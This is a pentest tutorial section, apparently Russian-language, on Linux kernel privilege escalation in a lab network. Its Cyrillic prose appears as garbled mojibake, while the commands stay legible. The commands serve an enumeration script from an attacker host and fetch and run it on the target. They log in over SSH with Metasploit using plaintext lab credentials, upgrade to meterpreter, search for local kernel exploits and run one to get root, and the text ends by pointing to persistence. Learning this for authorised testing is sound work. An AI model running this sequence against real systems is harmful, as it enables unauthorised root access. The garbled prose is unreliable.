04 - Kernel exploits
Π’Π΅ΠΏΠ΅ΡΡ ΠΌΠΎΠΆΠ½ΠΎ ΡΠ°ΡΡΠΌΠΎΡΡΠ΅ΡΡ ΠΌΠ΅ΡΠΎΠ΄ ΠΏΠΎΠ²ΡΡΠ΅Π½ΠΈΡ ΠΏΡΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ Ρ ΠΏΠΎΠΌΠΎΡΡΡ ΡΠΊΡΠΏΠ»ΠΎΠΉΡΠΎΠ² ΡΠ΄ΡΠ°. ΠΡΡΡ Π½Π΅ΡΠΊΠΎΠ»ΡΠΊΠΎ Π²Π°ΡΠΈΠ°Π½ΡΠΎΠ² ΠΊΠ°ΠΊ ΡΡΠΎΠ³ΠΎ ΠΌΠΎΠΆΠ½ΠΎ Π΄ΠΎΠ±ΠΈΡΡΡΡ, Π½Π°ΠΏΡΠΌΠ΅Ρ Ρ ΠΈΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°Π½ΠΈΠ΅ΠΌ ΡΡΠ΅ΠΉΠΌΠ²ΠΎΡΠΊΠ° metasploit, ΠΈΠ»ΠΈ Ρ ΠΏΠΎΠΌΠΎΡΡΡ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½Π°ΡΠ° LES: Linux privilege escalation auditing tool , ΠΈΠ»ΠΈ Π²Ρ ΡΠ°ΠΌΠΎΡΡΠΎΡΡΠ΅Π»ΡΠ½ΠΎ ΡΠΌΠΎΡΡΠΈΡΠ΅ Π²Π΅ΡΡΠΈΡ ΡΠ΄ΡΠ°, ΠΏΠΎΡΠ»Π΅ ΡΠ΅Π³ΠΎ ΠΈΡΠ΅ΡΠ΅ ΠΏΠΎΠ΄Ρ ΠΎΠ΄ΡΡΠΈΠΉ ΡΠΊΡΠΏΠ»ΠΎΠΈΡ. ΠΠ΄Π½Π°ΠΊΠΎ ΡΠ»Π΅Π΄ΡΠ΅Ρ ΠΏΠΎΠΌΠ½ΠΈΡΡ, Π»ΠΎΠΌΠ°Ρ ΡΠ΄ΡΠΎ - ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎΠ»ΠΎΠΆΠΈΡΡ Π²Π΅ΡΡ Ρ ΠΎΡΡ, ΠΈΠΌΠ΅Π½Π½ΠΎ ΠΏΠΎΡΡΠΎΠΌΡ ΡΡΠΎΡ Π²Π°ΡΠΈΠ°Π½Ρ ΡΠ°ΡΡΠΌΠ°ΡΡΠΈΠ²Π°Π΅ΡΡΡ ΠΏΠΎΡΠ»Π΅Π΄Π½ΠΈΠΌ.
ΠΠ°ΡΠ½Π΅ΠΌ Ρ LES: Linux privilege escalation auditing tool .
ΠΡ ΠΌΠΎΠΆΠ΅ΠΌ ΡΡΠ°Π·Ρ ΡΠΊΠ°ΡΠ°ΡΡ Π΅Π³ΠΎ Π½Π° Π°ΡΠ°ΠΊΡΠ΅ΠΌΡΠΉ Ρ ΠΎΡΡ, Π΄Π°ΡΡ ΠΏΡΠ°Π²Π° Π½Π° ΠΈΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΈ Π·Π°ΠΏΡΡΡΠΈΡΡ. ΠΠΎ Ρ Π±ΡΡΡΡΠΎ ΠΏΠΎΠΊΠ°ΠΆΡ ΠΊΠ°ΠΊ ΠΏΠ΅ΡΠ΅Π΄Π°Π²Π°ΡΡ ΡΠ°ΠΉΠ»Ρ Ρ Ρ ΠΎΡΡΠ° Π°ΡΠ°ΠΊΡΡΡΠ΅Π³ΠΎ Π½Π° Ρ ΠΎΡΡ Π½Π° ΠΊΠΎΡΠΎΡΠΎΠΌ ΠΌΡ Π±ΡΠ΄Π΅ΠΌ Π»ΠΎΠΌΠ°ΡΡ ΡΠ΄ΡΠΎ Ρ ΠΏΠΎΠΌΠΎΡΡΡ python http server, ΡΡΠΎ Π±ΡΠ²Π°Π΅Ρ ΠΎΡΠ΅Π½Ρ ΠΏΠΎΠ»Π΅Π·Π½ΠΎ.
// ΠΠ° Ρ
ΠΎΡΡΠ΅ Π°ΡΠ°ΠΊΡΡΡΠ΅Π³ΠΎ:
// Π‘ΠΊΠ°ΡΠΈΠ²Π°Π΅ΠΌ LES ΠΈ ΠΏΠΎΠ΄Π½ΠΈΠΌΠ°Π΅ΠΌ Π² ΡΠΎΠΉ ΠΆΠ΅ ΠΏΠ°ΠΏΠΊΠ΅ SimpleHTTPserver Π½Π° ΠΏΠΎΡΡΡ 9000
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
sudo python3 -m http.server 9000
// ΠΠ° Ρ
ΠΎΡΡΠ΅ Π³Π΄Π΅ Π»ΠΎΠΌΠ°Π΅ΠΌ ΡΠ΄ΡΠΎ:
// ΠΠ΅ΡΠ΅Ρ
ΠΎΠ΄ΠΈΠΌ Π² ΠΏΠ°ΠΏΠΊΡ /tmp ΡΠΊΠ°ΡΠΈΠ²Π°Π΅ΠΌ LES, Π΄Π°Π΅ΠΌ ΠΏΡΠ°Π²Π° Π½Π° Π·Π°ΠΏΡΡΠΊ ΠΈ ΡΡΠ°ΡΡΡΠ΅ΠΌ Π΅Π³ΠΎ
cd /tmp
wget 192.168.140.128:9000/less.sh
chmod +x less
./less

ΠΠΎΡΠ»Π΅ Π·Π°ΠΏΡΡΠΊΠ° ΡΠΊΡΠΈΠΏΡΠ° LES, Π°Π²ΡΠΎΠΌΠ°ΡΠΈΡΠ΅ΡΠΊΠΈ Π²ΡΠ²Π΅Π΄Π΅Ρ ΠΏΠΎΠ»ΡΡΠ΅Π½Π½ΡΡ ΠΈΠ½ΡΠΎΡΠΌΠ°ΡΠΈΡ ΠΎ ΡΠ΄ΡΠ΅, Π½ΠΎΠΌΠ΅ΡΠ° CVE ΠΈ ΠΎ ΠΏΠΎΠ΄Ρ ΠΎΠ΄ΡΡΠΈΡ ΡΠΊΡΠΏΠ»ΠΎΠΈΡΠ°Ρ ΠΏΠΎΠ΄ ΡΠ΄ΡΠΎ. ΠΠ°ΠΈΠ±ΠΎΠ»Π΅Π΅ ΡΠ΄Π°ΡΠ½ΡΠ΅ Π²Π°ΡΠΈΠ°Π½ΡΡ ΡΠ°ΡΠΏΠΎΠ»ΠΎΠΆΠ΅Π½Ρ Π² ΡΠ°ΠΌΠΎΠΌ Π²Π΅ΡΡ Ρ, ΡΠ°ΠΌ ΠΆΠ΅ ΠΈΠΌΠ΅Π΅ΡΡΡ ΡΡΡΠ»ΠΊΠ° Π½Π° ΡΠΊΡΠΏΠ»ΠΎΠΈΡ ΠΈ Π±Π°Π·Ρ Π·Π½Π°Π½ΠΈΠΉ ΠΏΠΎ Π½Π΅ΠΌΡ. ΠΡΡΠ°Π»ΠΎΡΡ Π»ΠΈΡΡ ΡΠΊΠ°ΡΠ°ΡΡ ΡΠΊΡΠΏΠ»ΠΎΠΈΡ, ΠΏΡΠΎΡΠΈΡΠ°ΡΡ ΠΊΠ°ΠΊ ΠΎΠ½ ΡΠ°Π±ΠΎΡΠ°Π΅Ρ (Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎ Π΅Π³ΠΎ Π½ΡΠΆΠ½ΠΎ ΠΊΠΎΠΌΠΏΠΈΠ»ΠΈΡΠΎΠ²Π°ΡΡ) ΠΈ Π·Π°ΠΏΡΡΡΠΈΡΡ Π½Π° Π°ΡΠ°ΠΊΡΠ΅ΠΌΠΎΠΌ Ρ ΠΎΡΡΠ΅. Π Π½Π°ΡΠ΅ΠΌ ΡΠ»ΡΡΠ°Π΅ ΡΡΠΎ Π½Π΅ ΡΡΠ΅Π±ΡΠ΅ΡΡΡ ΡΠ°ΠΊ ΠΊΠ°ΠΊ ΡΡΡ ΠΌΡ ΠΏΠΎΠ»ΡΡΠΈΠ»ΠΈ ΡΠ΅ΡΠ΅Π· misconfig.

METASPLOIT
Π’ΡΡ ΡΠΎΠΆΠ΅ ΠΊΠ°ΠΊ ΠΈ Π²Π΅Π·Π΄Π΅ Π΅ΡΡΡ ΠΌΠ½ΠΎΠΆΠ΅ΡΡΠ²ΠΎ ΠΌΠ΅ΡΠΎΠ΄ΠΎΠ² ΠΊΠ°ΠΊΠΈΠΌ ΠΏΡΡΠ΅ΠΌ ΠΏΠΎΠΉΡΠΈ. ΠΠΎ Ρ Π½Π°Ρ ΡΠΆΠ΅ Π΅ΡΡΡ SSH ΡΡΠ΅ΡΠΊΠΈ, Π΄Π°Π²Π°ΠΉΡΠ΅ ΠΈΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΡ ΠΈΡ . ΠΠ»Π°Π½ Π΄Π΅ΠΉΡΡΠ²ΠΈΠΉ Π±ΡΠ΄Π΅Ρ ΡΠ°ΠΊΠΎΠΉ: 1. ΠΎΡΠΊΡΡΠ²Π°Π΅Ρ metasploit 2. ΠΡΠ΅ΠΌ Π½ΡΠΆΠ½ΡΠΉ ΠΌΠΎΠ΄ΡΠ»Ρ Π΄Π»Ρ Π»ΠΎΠ³ΠΈΠ½Π° ΠΏΠΎ ssh 3. ΠΠ±ΠΈΠ²Π°Π΅ΠΌ Π² ΠΌΠΎΠ΄ΡΠ»Ρ ΠΈΠ·Π²Π΅ΡΡΠ½ΡΠ΅ Π½Π°ΠΌ ΡΡΠ΅ΡΠΊΠΈ ΠΈ ip 4. ΠΠΎΠ΄Π½ΠΈΠΌΠ°Π΅ΠΌ ssh ΡΠ΅ΡΡΡΠΈΡ Π΄ΠΎ meterpreter (ΡΡΠΎ ΡΠ°ΡΡΠΈΡΠ΅Π½Π½Π°Ρ ΠΏΠΎΠ»Π΅Π·Π½Π°Ρ Π½Π°Π³ΡΡΠ·ΠΊΠ°/payload) 5. ΠΡΠ΅ΠΌ ΠΏΠΎΠ΄ΠΎΡ ΠΎΠ΄ΡΡΠΈΠΉ ΡΠΊΡΠΏΠ»ΠΎΠΈΡ ΡΠ΄ΡΠ° 6. Π ΠΏΡΠΎΠ±ΡΠ΅ΠΌ ΠΏΡΠΎΠ±ΠΈΡΡ ΡΠ΄ΡΠΎ ΠΈ ΠΏΠΎΠ»ΡΡΠΈΡΡ root
// Π·Π°ΠΏΡΡΠΊΠ°Π΅ΠΌ ΠΌΠ΅ΡΠ°ΡΠΏΠ»ΠΎΠΈΡ
msfconsole
// ΠΈΡΠ΅ΠΌ ΠΌΠΎΠ΄ΡΠ»Ρ Π΄Π»Ρ Π»ΠΎΠ³ΠΈΠ½Π° ΠΏΠΎ ssh
search ssh_login
// Π·Π°ΠΏΡΡΠΊΠ°Π΅ΠΌ ΠΌΠΎΡΠ»Ρ
use auxiliary/scanner/ssh/ssh_login
// Π²Π±ΠΈΠ²Π°Π΅ΠΌ Π² ΠΌΠΎΠ΄ΡΠ»Ρ ΠΈΠ·Π²Π΅ΡΡΠ½ΡΠ΅ Π½Π°ΠΌ Π΄Π°Π½Π½ΡΠ΅
set rhost 192.168.140.129
// ΠΈΠΌΡ
set username steven
// ΠΏΠ°ΡΠΎΠ»Ρ
set password pink84
// ΠΏΡΠΎΠ±ΡΠ΅ΠΌ ΠΏΡΠΎΠ±ΠΈΡΡΡΡ ΠΏΠΎ ssh
exploit
// ΠΏΠΎΠ΄Π½ΠΈΠΌΠ°Π΅ΠΌ ΡΠ΅ΡΡΠΈΡ Π΄ΠΎ meterpreter
use post/multi/manage/shell_to_meterpreter
// ΡΠΊΠ°Π·ΡΠ²Π°Π΅ΠΌ ΠΊ ΠΊΠ°ΠΊΠΎΠΉ ΡΠ΅ΡΡΠΈΠΈ ΠΏΡΠΈΠ²ΡΠ·Π°ΡΡ ΠΌΠΎΠ΄ΡΠ»Ρ (show sessions)
set session 1
//Π·Π°ΠΏΡΡΠΊΠ°Π΅ΠΌ
exploit
// ΡΠΌΠΎΡΡΠΈΠΌ ΡΠΏΠΈΡΠΎΠΊ ΡΠ΅ΡΡΠΈΠΉ ΠΈ ΠΈΡΠ΅ΠΌ ΡΠ°ΠΌ meterpreter
sessions
// ΠΈ Π·Π°Ρ
ΠΎΠ΄ΠΈΠΌ Π² ΡΠ΅ΡΡΠΈΡ Ρ meterpreter
sessions 2

// Π·Π°ΠΏΡΡΠΊΠ°Π΅ΠΌ ΠΏΠΎΠΈΡΠΊ ΠΏΠΎΠ΄Ρ
ΠΎΠ΄ΡΡΠ΅Π³ΠΎ ΠΏΠΎΠ΄ ΡΠ΄ΡΠΎ ΡΠΊΡΠΏΠ»ΠΎΠΈΡΠ°
use post/multi/recon/local_exploit_suggester
// ΡΠΌΠΎΡΡΠΈΠΌ Π½ΠΎΠΌΠ΅ΡΠ° ΡΠ΅ΡΡΠΈΠΉ
show sessions
// ΠΏΡΠΈΠ²ΡΠ·ΡΠ²Π°Π΅Ρ ΠΏΠΎΠΈΡΠΊ ΡΠΏΠ»ΠΎΠΈΡΠ° ΠΊ ΡΠ΅ΡΡΠΈΠΈ ΠΌΠ΅ΡΠ΅ΡΠΏΡΠ΅ΡΠ΅ΡΠ°
set session 2 (Ρ Π²Π°Ρ Π±ΡΠ΄Π΅Ρ ΠΎΡΠ»ΠΈΡΠ°ΡΡΡΡ)
// Π·Π°ΠΏΡΡΠΊΠ°ΠΌ ΠΈ ΠΠΠΠ. ΠΠΎΠ»Π³ΠΎ. Π ΠΊΠΎΠ½ΡΠ΅ ΡΠΊΡΠΈΠΏΡ ΠΏΡΠ΅Π΄Π»ΠΎΠΆΠΈΡ Π»ΡΡΡΠΈΠ΅ Π²Π°ΡΠΈΠ°Π½ΡΡ Π² ΡΠ°ΠΌΠΎΠΌ Π²Π΅ΡΡ
Ρ
//(Π΅ΡΠ»ΠΈ ΠΎΠ½ΠΈ Π΅ΡΡΡ)
run

ΠΠ°ΠΌ ΠΎΡΡΠ°Π»ΠΎΡΡ Π²ΡΠ±ΡΠ°ΡΡ ΡΠΊΡΠΏΠ»ΠΎΠΈΡ, Π½Π°ΡΡΡΠΎΠΈΡΡ Π΅Π³ΠΎ, ΠΏΡΠΈΠ²ΡΠ·Π°ΡΡ ΠΊ ΡΠ΅ΡΡΠΈΠΈ ΠΈ Π·Π°ΠΏΡΡΡΠΈΡΡ
// Π²ΡΠ±ΠΈΡΠ°Π΅ΠΌ ΡΠΏΠ»ΠΎΠΈΡ
use ΠΈΠΌΡ_ΡΠΊΡΠΏΠ»ΠΎΠΈΡΠ°_ΠΈΠ·_ΡΠΏΠΈΡΠΊΠ°
// Π²Π½ΠΈΠΌΠ°ΡΠ΅Π»ΡΠ½ΠΎ ΡΠΌΠΎΡΡΠΈΠΌ ΠΊΠ°ΠΊΠΈΠ΅ ΠΏΠΎΠ»Ρ Π½ΡΠΆΠ½ΠΎ Π·Π°ΠΏΠΎΠ»Π½ΠΈΡΡ (Π² ΠΌΠΎΠ΅ΠΌ ΡΠ»ΡΡΠ°Π΅ ΡΡΠΎ LHOST (ip Π°ΡΠ°ΠΊΡΡΡΠ΅Π³ΠΎ)
// ΠΈ Π½ΠΎΠΌΠ΅Ρ ΡΠ΅ΡΠΈΠΈ Ρ meterpreter)
show options
set lhost 192.168.140.128
set session 4
exploit

ΠΠ°ΠΊ Π²ΠΈΠ΄Π½ΠΎ ΠΈΠ· ΡΠΊΡΠΈΠ½ΡΠΎΡΠ°, ΡΠ΄ΡΠΎ ΠΏΡΠΎΠ±ΠΈΡΠΎ, ΡΡΡΠ°Π½ΠΎΠ²Π»Π΅Π½Π½Π° ΡΠ΅ΡΡΠΈΡ meterpreter, root Π½Π°Ρ. ΠΠ°ΠΌ ΠΎΡΡΠ°Π»ΠΎΡΡ ΠΊΠ°ΠΊ ΡΠ»Π΅Π΄ΡΠ΅Ρ Π·Π°ΠΊΡΠ΅ΠΏΠΈΡΡΡΡ Π½Π° ΠΏΡΠΎΠ±ΠΈΡΠΎΠΌ Ρ ΠΎΡΡΠ΅, ΡΡΠΎ Π±Ρ Π½Π΅ ΠΏΠΎΡΠ΅ΡΡΡΡ Π½Π°Π΄ Π½ΠΈΠΌ ΠΊΠΎΠ½ΡΡΠΎΠ»Ρ.
Last updated